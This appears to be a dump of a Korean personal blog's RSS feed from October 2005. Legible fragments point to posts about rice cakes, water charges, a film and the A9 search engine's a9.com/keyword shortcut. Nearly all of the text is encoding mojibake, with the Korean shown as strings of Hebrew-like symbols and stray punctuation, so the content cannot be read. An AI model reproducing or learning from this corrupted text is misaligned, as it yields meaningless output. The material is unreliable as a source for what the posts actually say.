    -24. ְ½½ִ¹¹ְַ״?? ְּ°ְֽת°ֽ²ֿ
    -25. ÷ס¿ְ¸יֱ¶¾ֶ?? ÷°·־¾ֱֱָ¾ֶ
    -26. ´«¿ֳ¶©ֱֱ±¸?? ´ח¿¬ָקֱֱֱצ
    -27. °טְ‎¹¹ֱֱ¾ֶ?? °¿ןְֿ°ֹ¿ה
    -28. ³כ·¡ְ÷ׂ·¯?? ְ½ִ¡¸¸¸יַװ
    -29. ³כ·¡¹זְ°¡?? ÷°·־¾ֱָס°
    -30. ֳדְ÷ְֳ´ֿ?? ±׳·²¸®°¡¿ה
    -¡¡
    -
    -31. ²ֹ¹¹ֱֱ¾ֶַ״?? ±½ךְ¸פ¶ף
    -32. ¼±¹°¹¹ֱֱ¾ֶ?? ´ֱֱ¾ֶַׂ°ֹ
    -33. ¿µָ­ֱֱ¾ֶַ״?? ¹¹±׳³ֹ±׳³ֹ
    -34. ְּ»ףַ¹÷µ¥?? ±טµ¿¿ְֿ־°¡
    -35. ¹¹°¡¼ֱַׂ״?? ¾ֻ¾ֶ¼­¹¹ַ״
    -36. ַק¾׳ַ¹¹¾?? ÷סְַװ´ֿ´
    -37. ´ֱ¡ְ÷¹¹´ֿ?? ´¼¸ְֲ×¾ֶ
    -38. ְוֱ¡ְ÷¹¹´ֿ?? ֲרַׁ»ח¶קְ׃
    -39. ְ־±ג´ֲ¸¹¾ֶ?? ³»»‎°¢÷¸´
    -40. ֳ¹»ח¶ְײ¾מ?? ´ח¿¬ָקְײֱצ
    -¡¡
    -
    -41. °בָ¥ְ÷¾נֱ¦?? ַֿ°װµַ´ֲ¶§
    -42. °¡¼צ¹¹ֱֱ¾ֶ?? ±½ך¿ֳ½ֳ´
    -43. ÷¸¹°ְּ¹¹¾?? ¾ֻ¾ֶ¼­¹¹ַ״
    -44. ֵכְֿ¹¶ף´ֿ?? ÷°·־¾ָ¹·¡
    -45. ֱ׳°ם½ְֽ»¶©?? ´¼¸ְֲ×¾ֶ
    -46. ֵ°½÷ַ״÷ֳ´ֿ?? ÷°°ֹ´¹¯³׳
    -47. ִִֵֽ¸¹ְַּ״?? ¿ה»קֱ»´תַ״
    -48. ´©±¸»‎°¢³×?? °©ְ±ג¹«½¼
    -49. ֱצ±¹ט°םִֶ?? ¾ֶ´ֿ¹ט÷ׂ·¯
    -50. ַֿ°ם½ְֽ÷¸»?? ְֱּ¦³¡³µ´ֿ
    -
    -
    -
    -
    -.... ¸»ְ» ְ¶ף¼­ַֿ·ֱ´ֿ °ַ¹זֱר¸»ֵץ°¡ µַ´ֲ ±÷¿ה. .... ¿ײ ½־°¡ֱצ(..)¾ר´ֲ ¸»ַֿ´ֲ »ח¶ק´ץ·¯ [¸»²ַ´ףְּ ¾מ´ ְ¶ף¸װ¾ת³ִ]°ם ַֿ´ֲ ֱצ ¾ֻ°½ְ´ֿ´. ^^;;]]>
    -¾ֶ¹«°ֵ³× ½÷ֵ©·¦ -ַֿ³כ¾ֶ -Wed, 5 Oct 2005 14:12:56 +0900 -
    - -¾ה³ֲָ¬ֲ¬ -http://chisato.info/blog/index.php?pl=662 - -±ז¿¡¼­ ִֶ´ֲ »¡°£ °ֵ ¸»°ם.. ֶַֿ° ¶± ³ײְ÷ ְ½½ְִּ¶ץ ְַ¹ּ.
    -
    -¿¹¸¦ µי¾מ.. ֲע´¿¡ ¶±ְ» ³ײ¾מֱ״´°ֵ³×, °¥÷סֲע, ִ«·¹, °£ְו.. ¼ׂ½÷´ֲ ¾מ¶² °ֵ¶ףµµ »ף°¾ר°ם(°םְֳו ¾ח³הְ» ¼±ָ£ֱַֿצ ¾ְ» »׃).. ¶±÷÷ְ½, ¶±ֱ¶¸².. ְּ·± °װ ֱֱ´.
    -
    -
    -
    -
    -
    -
    -
    -.... ¶± »ח·¯ ³×°¡±ג ±ֲֽת´.
    -
    -
    -
    -
    -
    -ַׁ¹רְ÷ ¾ִֶ§ ְֲֿן °¡·¡¶± ½ה¾מ³ץְ÷ °ֽ(¶±±¹¿כְ¸·־ ְ ¾²ְּ´ֲ)ְ» ¹¶ֵײ »ח´³ץ°ם.. ¶ף¸י ַֿ³× ²ת¿©¼­(¹°·׀ ¾ח³הְ÷ °³ְ־ְְ¸·־ ¸¸µי¾מ³ץ°ם ¾²´ֲ °ְּֽ µ·־ ְײ´) ±׳ ±¹¹°¿¡ ¶± ³ײ¾מ ²תְּ°ם ¶± °ֱַ® ¸װ°ם.. ֱ¡½ֹ ֱ» ³ׁ¾מ ¹ט°¡ ¶ַ °םֱַ±ז·¡ ¾ֶ±מ ¶ׁ²±´¾ֶ ³ץְ÷ ³¿÷ס¿¡ ¶± ֱ¶± ³ײ¾מ¼­ ¶ַ ²ת¿© ¸װ°ם.. ְת³ב ¹«·ֶ ±׳ ±¹¹°¿¡ ¶ַ ֱ¶± ³ײ¾מ¼­ ֱ¶¸° µם ¸װ°ם.. TV ÷¸¸י¼­ ¶ַ ¶±ְ» ³ײ¾מ¼­.. ַֿ¿©ֶ° ַֿ·חֱ¾ְֿ ±¹¹° ³ֻ³ָֻק ְג¾ֶµ׀ ³¿÷ס ַֿ³×¶ ֵ« °¡·¡¶± ְֶׁ¸·־ ÷¸³½ ְְּ ְײ´.
    -
    -.... ³­ ֱֱ¾ֶַֿ´ֲ ְ½½ִ ַֿ³×¸¸ ¸װְ¸¸י¼­ »ל ¼צ ְײ´ֲ »ח¶קְּ¾.
    -
    -
    -
    -
    -¸צְּ ¾ֱֶַ°ֵ³× ַַ°ןַֿ¸י ¸װ°ם ½ְֽ÷°ַ »לֲ¦ ´´ַֿ°װ ¸¸µח µֱֵצ°¥÷ס ֲעְּ´. ְּ°ֹ [¹טֱֵֽצ°װ] ¸װ´ֲ °ֵ ֱֱ¾ֶַׁ´. .... ¶± ¹, °¥÷ס ¹ µי¾מְײְ¸¸י ֱֱ°´. .... ¶± 3 : °¥÷ס 1 ְַ ÷סְ²ְּ¸י ´ץ ֱֱ°ם. .... ±׳ ְּ»ףְּ¸י ¸ְְּ ֱ¦´כ·־ ¾ָ ³×¿ֱֳצ ¸נ¸£´ֿ±ס ֲ¾ֶ¾ֱצ.
    -
    -
    -
    -ֵ« ³¿÷ס¿¡ ִ«·¹°¡ µכ»ׂ µי¾מְײ´. .... ¶± »ח·¯ ³×°¥±מ? ±ֲֽת±גµµ ֱַֿצ.
    -
    -.... ֱַֿצ¸¸ 2400 ¿רֲ¥¸® ¶± ֶׁ(1kg ֱ₪µµ µי¾תְײ´. ְּ°ֵ¸י ¸מ ¹ר ¸װ°ֱצ) ¸¸ ¹ט´ַ״ֱײ´ֲ °קְּ ְײְ»¸®°¡ ¾ר´. .... ³×°¡¾ ַֿ³×. .... ַ״°¡ ֲ¸ֲ¸ַֿ½ֳ±גµµ ֱַֿצ....]]>
    -»ל¾ֶ°¡´.. -ַֿ³כ¾ֶ -Wed, 5 Oct 2005 13:34:24 +0900 -
    - -ֳ»°טֳµ ÷¹¿ר, ְּ°ְֽ÷ ֱ¦´כ·־ ¾ֻ°ם ³ׁ¾מ°©½ֳ´ -http://chisato.info/blog/index.php?pl=661 -
    -ֳ»°טֳµ ÷¹¿ר¿¡ ´כַ״¼­ ְּ·±ְת·± ¾ך±גµיְּ ¸¹±÷¿ה.. ¿צ³« ְ¥°ת µמֱר ֳ₪ »ל¾ֶ°¡°ם ְײ¾מ¼­ ´ץ ְ¼¼ָק ְ׀ְ¸·¯ ´´ׂ »ףָ²µµ ¾ֶ´ױ´ֿ´¸¸..
    -ְּ°ֽ ַׁ °¡ֱצ´ֲ ²ְ ¾ך±גַֿ°ם ½ֽ¾מ¼­ ±ְ» ¾¹´ֿ´.
    -
    -
    -
    -[¹°°×]¿¡ °·ֳ µָ ÷־÷׀ְװ´ֿ´. :)
    -
    -
    -
    -
    -ְּ·¸´ְת·¸´ ¾ך±ג°¡ ÷׀÷׀ַױ´ֿ´¸¸, ֳ»°טֳµ¿¡ ָו¸£°ם ְײ´ֲ ¹°ְ÷ ¼­¿ן½ֳ°¡ [°רֲ¥]·־ ¾²°ם ְײ½ְ´ֿ´. ¾מ¶»°װ ְּ·² ¼צ ְײ´ֲ°¡¿¡ °ַׁ ÷סְַֿ־µו(?) ½÷ֵה¸®µµ ְײְ¸´ֿ.. ±׳ ¾ך±ג¸¸ ַֿ°ם ֱ¢ְ»±מ ַױ´ֿ´.
    -
    -
    -´כַׁ¹־±¹¿¡¼­ ¹°ְ» ¾²·ֱ¸י µ·ְ» ³»¾ ַױ´ֿ´. ¿ײ ±׳·²±מ¿ה? °­ְּ ´ ³×¶ף ¹° ָו¸£´ֲ °קְּ¾מ¼­´ֲ ¾ֶ´ױ´ֿ´. ¹°ְּ¶ף°ֵ³×, °ר±ג¶ף°ֵ³×.. ±׳·± °ַ ¸נµ־ °רֲ¥ֱׂ, ¿ר·¡.. ¸¸¾א ±׳³ֹ [´כַׁ¹־±¹ ±¹ֵה ְ§¸¦ ָו¸£°ם ְײ´]´ֲ ְְּ¯¸¸ְ¸·־ µ·ְ» ¹´ֲ °ֵ¶ף¸י ¿ל¸®´ֲ [ָ£ָם¼¼]µµ ³»¾ ַױ´ֿ´.
    -
    -±׳·¯¸י ֱ₪´חַׁ ְְּ¯µµ ¾רְּ µ·ְ» ¹´ְ³ִ? ְּ°ֽ ¶ַַׁ ¾ֶ´ױ´ֿ´.
    -
    -
    -
    -
    -
    -¿ל¸®´ֲ [´ן]¿¡ °·ֳµָ ¹°ְ» »ח¿כַׂ ¶§ ¼צְ¿ר°ר»ח¿¡ µ·ְ» ֱצ÷ַׂ״¾ ַױ´ֿ´.
    -
    -
    -
    -ְּ°ְֽ÷ °³¹ְּ ֳַׁ¢ְּ´ר ½ֳ´כ¿¡ ֱ₪ַ״ֱר ¹‎ְװ´ֿ´. ±׳³ֹ ָך·¯°¡´ֲ ¹°¿¡ ¹«ְֱ₪ µ·ְ» ¹ְ» ¼צ´ֲ ¾רְ¸´ֿ ְְּ¯´ֲ ַ¿הַֿ°ם, ¼¼±µµ ±ַֽֿ°ם.. ¹¹ ¿©·¯ ְְּ¯°¡ ֱֳ¸µַ¾ת´ר »ח¾ְָּ¾תְ» °ּ´ֿ´.
    -¹®ֱ¦´ֲ.. ´כַׁ¹־±¹¿¡ ´ן ¾ר´ֲ °­ְּ ְײְ»±מ¿ה?;;
    -
    -¼צְ¿ר°ר»ח´ֲ °ב±¹, ¸נµח ֳַֿµְַ [ְּ¿כ·ב]¸¦ ¹ְ» ¼צ ְײ°װ µָ °ּ´ֿ´.
    -
    -¹°·׀ °ב°ת´ֲ °°½ְ´ֿ´¸¸, ¼±ִָ°¡ ´¸¥ °ּ´ֿ´. [¼צְ¿ר]ְּ¶ף¼­ [¼צְ¿ר°ר»ח]°¡ µ·ְ» ¹´ֲ °װ ¾ֶ´ֿ°ם, [´ןְַ ¹°ְ» ¾²´ֲ µ·]ְ» ¹ְ» ¼צ ְײ´ֲ °ַµ¥ [¸נµח] ֳַֿµ¿¡ ´ןְּ µי¾מ¼­ְײ´÷¸´ֿ [¸נµח] ¹°¿¡µµ ¼צְ¿ר°ר»ח¿¡ ְּ¿כ·ב°¡ ֱצ÷ׂµַ¾מ¾ ַֿ´ֲ »ףָ²ְ¸·־ ±ֽ°בµָ °ְֱּֽׂ.
    -
    -
    -
    -¹°·׀ ְּ¹ר ¼­¿ן½ְֳַ ֳ»°טֳµ ÷¹¿ר ¶§µµ, ¼צְ¿ר°ר»ח´ֲ ְּ¿כ·ב¸¦ ֳ»±¸ַׂ °טָ¹ְּ¾ת´°ם ַױ´ֿ´.
    -
    -±׳·±µ¥ (ְּ ÷־÷׀ְ÷ ֱ¦°¡ ֱ₪ָ®ָק´ֲ ¸נ¸¨´ֿ´¸¸) ¹°ְַ ְּ¿כ·ב¸¦ ¹ְ» ¼צ ְײ´ֲ ¶ַ´¸¥ ±°ֵ´ֲ ±׳ ¹°ְּ [ְח»ח¿כ ÷ׂ°¡]»ףֲֵ°¡ µַ±ג ¶§¹®ְּ±גµµ ַױ´ֿ´. ְְְַ ְְּ¯°¡ [»ח¿כ·ב¸¦ ¹ְ» ¼צ ְײ´ֲ ֱ״÷ס´°ט]¶ף¸י ְּ ֱ¶°ְַ÷ [¹¾ֶ¾ַֿ´ֲ ַ¼צ¿ה°ַ]ְּ¶ף°ם ַ¥ַצַ״÷¼±מ¿ה?
    -
    -¿¹¸¦ µי¾מ.. °¡ֱ₪¿¡¼­ »‎ָ°¿כ¼צ·־ ¼צµ¾¹°ְ» ²ר¾מ´¾´ ִָ, ±׳ ¹°ְ÷ ¾מ¶² [ֳ³¸®]¾רְּ´ֲ ´½ֳ ¾µ ¼צ ¾ר½ְ´ֿ´. ±׳·¡¼­ [»ח¿כ·ב]¸¦ ³»¾ ַױ´ֿ´. ְּ [»ח¿כ·ב]·־ ¼צֱתֱ₪ָ­¶ף°ֵ³×, ´¸¥ ֳ³¸®°¡ °¡´ַֹ״ֱצ´ֲ °ְֱּֽצ¿ה.
    -µ¶ף¼­ ֳ»°טֳµְ» ±׳ְת [ָו¸£±ג ¸¸] ַֿ°ם ÷ֱ®³×°¥ ¹°¿¡´ֲ ְּ¿כ·ב¸¦ ÷־°תֱַֿצ ¾¾ֶ¾ ֱ₪»ףְֱּׂ.
    -ֱַֿצ¸¸ ֳ»°טֳµְּ¶ף´ֲ °ְּֽ (¾ֶ½ֳ´½ֳַַ) ְ¿¬ֳַֿµְּ°ֵ³× ַׁ °ְּֽ ¾ֶ´ֿ¶ף ְֱֿ¾ְַ [°ֵ´כַׁ ָ£¼צ]¿ֽ °°½ְ´ֿ´. ַַׁ¬ְּ¶ףµµ ¾ֶ½¬¿מ ְּ »ףָ²¿¡¼­ ¸»¸¸ ְ ֱ₪¸®ַֿ¸י ֳז÷׀ָק »ח¿כ·ב¸¦ ֳ»±¸ַׂ ¼צ ְײְ¸¸ח, ¸¸¾א »ח¿כ·ב°¡ ֳ»±¸µַ¾מ¾ ַ´¸י ֳ»°טֳµ ÷¹¿רְ÷ ¿ה¿רַ״ֱ³ְ» °ּ´ֿ´.
    -
    -
    -±׳ ¹®ֱ¦ְַ ³םְַ ½ֱֳ¡¿¡¼­µµ ¸¹ְ÷ ְַ°ְּ ³×¿װ¾ת´°ם ַױ´ֿ´. ´כ÷־÷׀ְ÷ »ח¿כ·ב¸¦ ¹´ֲ °ֽ¿¡ µ¿ְְַַ¸³× ¹´כ ֲ¿¡¼­ ְּ ַׁ¸¶µנ·־ ֶעֱ₪(?)ַ´´ֲ ְּ¾±ג¸¦ µי¾ת½ְ´ֿ´.
    -
    -
    ±׳·³ ַׁ°­¿¡ ¶°ְײ´ֲ ְ¯¶ק¼±ְ÷?

    -
    -.... ְ¯¶ק¼±µµ ַׁ°­ְַ ¹°ְ» ¾²°ם ְײ´ֲ °ֵ°ֱצ¿ה? .... ¹¹, ¾מֲמ¾מֲמ ¾ך±ג°¡ °ב±¹ְ÷ [»ח¿כ·ב ³»ֱצ ¾¾ֶµµ µַ»ן]ַֿ´ֲ ְֲ¸·־ ָך·¯ֱײ¾מ¼­ ÷¹¿ר»ח¾קְ÷ ָ°±ג¸¦ ¶ח¾תְ» °ּ´ֿ´.
    -
    -
    -
    -
    -
    -¹¹, ְּ·± °ּ´ֿ´. »ח¿כ·ב ÷־÷׀ְ¸·־´ֲ ְֱּ¦ ½־¿לֱצµי ¸¶½ֳ±ז. °רֲ¥¶ף°ם ַױ´ֿ´. ^^]]>
    -»ל¾ֶ°¡´.. -ַֿ³כ¾ֶ -Wed, 5 Oct 2005 13:01:57 +0900 -
    - -סיµ¥ףר¡¢¡¸«»«««ף«ֹ«י«ײ - NEW Ver.¡¹¡£ -http://chisato.info/blog/index.php?pl=660 - -
    -¸םְו¸י ¸נְ½¿µ»ף(ְֿ÷»¾מ·־´ֲ £»ם״ף¢ ¶ף°ם ³×¿ְ°ם ְײ´ֲµ¥ ְּ [¸ם¹ּ]¶ף´ֲ ¸»ְּ ¿ל¸®³×¶ף¿¡¼­ ָחַֿ°װ ¾²ְּ´ֲ ¸»ְ÷ ¾ֶ´ׁ µם ַֿ±ג¿¡ ְ׃ְַ·־ ַ״¼®ַ´)ְ÷ ¿©·¯°¡ֱצ°¡ ֶםֱ‎µַ¾מ ÷¸¿©ֱצ°ם ְײֱצ¸¸ ±׳ ֱ ´¿¬ ֳ¹¼ױ¿¡ ²ֵ°ם ½ְֽ÷ ְו¸יְ÷ [¼¼ֱִµו ·¯÷ך]¸¦ ÷־¸£´°¡ ְ½ְּ ֱ¦´כ·־ ³×¿ְֱצ ¾¾ֶ ¼׃»ףַ״ַֿ´ֲ ¸נ½ְְּ´. 1ְ§ ¿µ»ףְ־µ¥, ָ₪½ֳ ֳ¹ 1ְ§°¡ ¾ֶ´ׂ±מ ½ֽ´. ¾ֶ¸¶ ±׳·¡¼­ ְ½ְ» ְ¯ֱצַֿ±ג ¾מ·ֱ¿ְ»ֱצµµ.
    -.... ±׳³×ְת³× ³כ÷ך¶ף(..)°¡ ְגַ´ר ¿µ»ףµµ ´½ֳ µ¹ְִּׁ ÷¸¿©ֱײ´ֲ ְְּ¯´ֲ?;;
    -
    -
    ´«¹°ְ» ´´ֲ ¾ֵֶ°³×.
    -.... ³¹«³× »ח¶½÷·¯¿מ ַ¥ֱ₪.
    ´«¹°ְּ ¶ַ·־·ֿ....

    -
    -
    -ֶ¯ֱ‎ ¿µ»ף ¾ך±ג´ֲ ְּ ֱ₪µµ ַֿ°ם, ÷»¹זְַ ¾ֵֶ°³×·־ ³ׁ¾מ°¡ְ.
    -
    -
    ֱ₪¸י ֲן±ג ½ֶַ׀..
    ֱֲ(ס§)·־÷־ֵֽ ¸ְִ¡.
    -¸נ¸§x2(..¾מֲ¼ְ°ם). ¾ֵֶ°³×. ֵ׳ֳקִ ¿©»ח
    ֶ¯÷°ַׁ ְו½ְִּ ¾ר´ֲ ֲ£ַ׸¥ ֳ»»צµו·¹½÷°¡ °¡ָק ¾׀±ְַּ´. ֶ¯ָק ְּ³¯ְ÷ ִם·־¾³×±ג »ףְּ ¸ֱר ÷׃ְ÷ µו·¹½÷ ֲק¸²ְ־µ¥, ְּ¿ֽ ´כ÷סµַ´ֿ ´ץ¿ם ´ְ³¦ְּ »ל¾ֶ³×´ֲ µם.
    -
    -
    -±׳·±µ¥.. ¾ׁ. .... ¸ְִ¡´ֲ ¿ײ ְּ»ףַׁ ְו¸י¿¡¼­ ֲןַ´ד..;;
    -
    -¾ֶ½¬¿ל´ֿ±מ (¸ֱר) ¸ְִ¡µµ ½÷ֶה¼ָ·־ ¼¦ְ»..
    -
    ֵ¬¸¯ַֿ¸י ֵ« ְּ¹ֱּצ°¡..
    -(¸®÷ה ְֳ¼ְַ ¼¦ ¸נµ־ µ¿ְֿ)
    ³׳ ¸ם ֱ 'ָ¥ְ¼­'
    - ֱ¦½÷ֳע¾מ¿ֽ ַװ²² µמְוַ´..
    ַל¾מ½÷ֵ¸ְֿ ¾ך±גµµ ³×¿װ°ם..

    -
    -½ֵ¹צֱ¯ְּ ¸¶ְ½¿¡ µו´ֲ °ז¿ל´ֲ ÷°·־ ָחֱַֿצ ¾ֱצ¸¸, ְּ¹ר °ְֽ÷ ֱ₪µµ¸¦ ¾מ±³×ֱצ ¾´ֲ ¼±¿¡¼­, ¼¼¿שְּ ָו¸¥ ´ְ³¦ְ» ¹°¾ְ ֱײ´ֲ ְֱֱ÷ ֶם°מְּ¾ת´.¾מ¸° ½ְֳ‎ְַ [¼¼ֱִµו·¯÷ך]¿ֽ´ֲ °ת¿¬ ´¸¥ °ְּֽ°ֱצ, ַֿ´ֲ ±ג÷׀?
    -°מְַ ֱ¦¸סְּ First Love °¡ ¾ֶ´ׁ Second Love ¶ף´ֲ °ְּֽ ¹«¾ש÷¸´ ¾ֵֶ°³× ´¿מ µם ַ״¼­ ¾ֱֶײ ֱֱ¾ֶַֿ´ֲ °מְּ´.
    -½ֵ¹צֱ¯ְ» µי¾מ÷¸°ם ½ְֽ¸½ֵ ÷׀.. ְּ °ט½ַ±מ? ¸®÷ה¸¦ ַֿ·ֱ°ם ְְּ °ֽµי µיֳח÷¸´°¡, ְּ ¹·־ ְ¿¡ ¾´ ¾ֵֶ°³× ¸®÷ה°¡ µµֱֲַֿק µָ °ְֽ» ¾ֻ¾ׂ´. ֱ¶± ¾²´°¡ [´ץ ֱרµµ ¾ָ³×°¨]ַֿ°ם ¼ױ ³ץ¾ׂ´ץ¸¸..;;
    -±׳ ְְּ¯·־ [¹ְְ ¾רְ» °ֵ °°¾ֶ¼­]¶ף°ם ½ב³ץְ÷ °ֽµµ ¹°µַ¾ת´ ! .. .... ְ½. ְ״°ם ְײ¾ת³׳.. ¾ֵֶ°³×´ֲ ¹ְְ¾ר´ֲ ¸®÷הְַ ¼±µ־ֱײְ´(ָז). .... ְּ°ֽµµ ´ס±ְּ°ם ¹¹°ם ְ¹«ַׂ °ֽ °°¾ֶ¼­ ¸¶ְ½ְּ ¾²¸®´(ֵכ°מ). ÷°·־ ¹ְְµµ ¾ָ ³×¿ֳ °ֽ °°°ם, ±׳·¡¼­ ְ½¿רµµ »‎·«(¹«ֳ¥ְ׃ַֿ±÷). .... ¼¼ְִּ ¶§´ֲ ְ½¿רµµ ³ײ¾ת¾תֱצ¸¸.]]>
    -ֳ¾ןְ» ¸»ַֿ´ - ֳ»·ֲ¿¡ ָ£¼ַֿׂ´(ְ½¾ַ) -ַֿ³כ¾ֶ -Mon, 3 Oct 2005 16:16:25 +0900 -
    - -±¸±¸¸ֵ­ ֱס° ¾²´ֲ °ֻ»צ»חְֶּ®, A9 ! -http://chisato.info/blog/index.php?pl=659 - -
    -
    -
    -
    -
    -.... ¾ֶ¸¶ֱ¸ְּ¶ף°ם ַֿ´ֿ±מ ְּ»ףְַֿ¾ֶ;;
    -
    -
    -
    -
    -
    -
    -¿¹. ֱ₪ָ®ַׁ ָ£ִ×ְ÷ A9. ¾ֶ¸¶ֱ¸¿¡¼­ ¿מ¿µַֿ°ם ְײ½ְ´ֿ´.
    -
    -
    A9 ְַ ֳ±גָ­¸י

    -
    -ְוֱ¡ְ÷ ¸ֵ¿ל ´¼רַֿ°ם °£´ַֿ¸ח °­·ֲַֿ´´ֲ ֱ¡. ¸מ°¡ֱצְַ [½÷ֵ²]ְ» °ם¸¦ ¼צ ְײ°ם, ¹«¾ש÷¸´µµ [ְּ¹ֱּצ °ֻ»צ]¿¡ °­ַױ´ֿ´.
    -½÷ֵ²ְַ °ז¿ל´ֲ »צְּ¶ף°ֵ³×, ·¹ְּ¾ֶ¿פ °°ְ÷ °ְֽ» ֱ₪ַ״µ־°ם ¾µ ¼צ ְײ´ֲµ¥ °³ְ־ְַ ֳכַגְ» ¹¿µַ״ֱ״´´ֲ ÷־÷׀ְּ ֶ¯ֲ¡ְֱּׂ. ֳ±גְַ ±¸±ְ» ÷¸´ֲ °ֽ °°ְ÷ ¿¾חְ» ַֿ°ם ְײ°ם, °ֻ»צ°ב°תµµ ¸ֵ¿ל ±ע²ַֿ°װ ³×¿ֹ´ֿ´. ְּ¹ֱּצ °ֻ»צ¿¡ ְײ¾מ¼­´ֲ ±¸±÷¸´ [÷¸±ג ְֱֱ÷ ¸נ¾ח]ְ¸·־ ֳג·ֲַ״ֱ״´´ֲ ±ג÷׀ְּ±÷¿ה.
    -
    -¹«¾ש÷¸´ °¡ְו ¸¶ְ½¿¡ µו´ֲ °ְֽ÷ »ח½ַ, »ח¿כ ְֱ־ »חִֶ¸® ֳַ·¯±׳ְ־ [AcidSearch] ¿¡¼­ ´¼רַֿ°װ ¼³ֱ₪ְּ °¡´ַֹֿ´´ֲ ֱ¡ְװ´ֿ´. ¼³ֱ₪ְּ ´¼רַׂ ¼צ ְײ´ֲ ±מ´, ¹·־ ְּ ÷־÷׀ְּ A9 ְַ ֳײ´כְוֱ¡ְװ´ֿ´. ¹«½¼ ְַ¹ְּֿ±מ?!
    -
    -
    -ְּ ÷־÷׀ְ» ְ ִֶַלֳִ(?)÷¸°½ְ´ֿ´. ¿©±ג°¡ ֶקְ־ֶ®. A9 ְ» ֳֳµַֿ´ֲ ְְּ¯°¡ µַ´ֿ±מ¿ה.
    -
    -
    -ְ¾ֶ. ¼ר¼­´כ·־ »לֶל÷¸°½ְ´ֿ´.
    -
    -»חִֶ¸®ְַ [±¸±] °ֻ»צ¿כ ְֶװ´ֿ´.
    -
    ±ג÷»ְְ¸·־ ֱ¦°רµַ´ֲ °ֻ»צֶ. .... ±׳·±µ¥ ֱ» ´¸£´?!

    -¿¹. ¾א°£ ´¸¨´ֿ´. [Google ַׁ±¹] ְּ¶ף°ם µַ¾מְײ±÷¿ה.
    -
    -ְּ°ְּֽ ¹·־ »ח¿כַֿ°ם ְײ´ֲ ֳַ·¯±׳ְ־, AcidSearch ְַ ¼¼÷־¼³ֱ₪ְװ´ֿ´.
    -
    -ֱ¦ °ז¿ל, ְֿ÷»¾מ »ףְ§¿¡¼­ »חִֶ¸®¸¦ ¾²°ם ְײ±ג ¶§¹®¿¡ ±ג÷» ְֶ» ְּ¿כַֿ¸י ֱ¦´כ·־ °ֻ»צְ» ַׂ ¼צ ¾ר½ְ´ֿ´. ְֿ÷»±¸±¿¡¼­ ְֿ÷»¾מ ְ־ִµשְ¸·־ ֳ£±ג ¶§¹®ְֱּׂ. µ¶ף¼­ ַׁ± °ֻ»צ¾מ¸¦ ³ײְ¸¸י °ֻ»צ°ב°ת°¡ ¾¸ְֱװ´ֿ´.
    -
    -ְּ·² ¶§ AcidSearch ¸¦ »ח¿כַֿ¸י ַ״°בְּ µֻ´ֿ´. °ֻ»צֳ¢ְַ ¼³ֱ₪ְ» ´°¢ָ­ַ״ֱײ´ֲ ֳַ·¯±׳ְ־ְ¸·־, ´ֳאֵ°¸¦ ְּ¿כַ״¼­ °ֻ»צ»חְֶּ®¸¦ ֱצֱ₪ַׂ ¼צµµ ְײ´´ֲ ְוֱ¡ְּ ְײ½ְ´ֿ´.
    -
    °ֻ»צֳ₪³־ְ» ֳ°¡ַֿ°ֵ³× ֶםֱ‎ַׂ ¼צ ְײ°װ ַ״ֱ´ֿ´

    -
    -ְת´ֲ [»ח°תֵ°+K]´ֲ ַׁ±¹±¸±°ֻ»צ¿¡, [»ח°תֵ°+J]´ֲ ְֿ÷»±¸±°ֻ»צ¿¡ »ח¿כַױ´ֿ´.
    -ְּ °ז¿ל AcidSearch ְַ ¼³ֱ₪ְ÷ ´ְ½°ת °°¾ֱֶצֱׂ.
    -
    -
    ´¾חַׁ ±¸±»חְֶּ®°¡ µמ·ֿµַ¾מְײ½ְ´ֿ´

    -±׳¸²¿¡¼­ ÷׃ְ÷ »צְ¸·־ ַ¥½ֳµָ °קְ» ÷¸¸י, ±¸±°ֻ»צְ» ֱ¦´כ·־ ַֿ±ג ְ§ַ״ °ֻ»צ¾מְַ ¾נ¾מ¼³ֱ₪ְ» ַ״ֱײ´ֲ ÷־÷׀ְּ ÷¸ְּ½ַ °ּ´ֿ´.
    -ְּ°ְּֽ ֱ¦´כ·־ ¼³ֱ₪µֱַצ ¾ְ¸¸י ±¸±ְ÷ °ֻ»צ¾מ¸¦ [´¾מ ´ְ§]·־ ְ־½ֱִַֿצ ¸רַֿ°ם [ְ½ְ‎ ´ְ§]·־ ְ־½ִַֿ´ֲ µם ַױ´ֿ´.
    -
    -
    ¼³ֱ₪ְּ ¾מ±³×¸י °ב°ת¸¦ ¾ע±ג ָµי´.
    -'ַֿ³כ¾ֶ'·־ °ֻ»צַׁ °ב°ת. ְֿ÷»¾מ±¸±(ֱֲ) vs ַׁ±±¸±(¿ל)

    -
    -±׳·¯³× A9 ְ÷ ְּ·± ÷־÷׀ְּ ַ¿ה¾ר½ְ´ֿ´. ¾מ¶² ¾נ¾מ¸¦ ³ײ¾מµµ, ¹·־ ַ״°בַױ´ֿ´.
    -
    -
    °ֻ»צ¾מ°¡ µי¾מ°¡¾ַׂ ְ¥ֱײ¼ׂ ÷־÷׀

    -
    -
    -½±°װ ¸»ַ״, A9 ְ¸·־ °ֻ»צַֿ±ג ְ§ַ״¼­´ֲ a9.com ְּ¶ף´ֲ ֱײ¼ׂ µ¿¡ °ֻ»צ¾מ¸¦ [±׳³ֹ ֲן¾מ ³ײ±ג¸¸ ַֿ¸י] µָ´´ֲ °ְֽװ´ֿ´ !
    -
    -
    ֲֵֵֽ]¸¦ °ֻ»צַֿ°ם ½ְֽ¸¸י?
    ->> a9.com/ֲֵֵֽ
    -
    -[tatter]¸¦ °ֻ»צַֿ°ם ½ְֽ¸¸י?
    ->> a9.com/tatter
    -
    -[«¿«ֶ]¸¦ °ֻ»צַֿ°ם ½ְֽ¸¸י?
    ->> a9.com/«¿«ֶ

    -
    -ְּ·¸µם ֱײ¼ֲֵַׂ·־ ְ¥÷ך¶ף¿לֱ® ֱײ¼ֳׂ¢¿¡ ½ב³ײְ¸¸י ¿ְִֹ- ! ֱ¦ ¾ֶ¹«¸® ±¸±µµ ְּ·± ¹ז¹‎ְ¸·׀ °ֻ»צְּ ¾מ¸²¾ר½ְ´ֿ´.
    -
    -
    -
    -°ֻ»צ»חְֶּ®´ֲ ְּ°ְֽת°ֽ µ¹·ֱ¾²´ֲ °ְּֽ ְח¹ְּײֱׂ. ¹°·׀ ±¸±ְַ °­·ֲַׁ ַ״ֵ·;; ±ג´ְֹ÷ ±׳ ³×¸§ ְ¯¿כַױ´ֿ´¸¸, A9 µµ ַׁ¹ר ½ב÷¸½ֳ±ג ¹¶ר´ֿ´. »ץ·־¿מ ְח¹ּ¸¦ ´ְ³¢½ַ ¼צ ְײְ» °ּ´ֿ´. ^^
    -
    -A9: http://a9.com/
    -
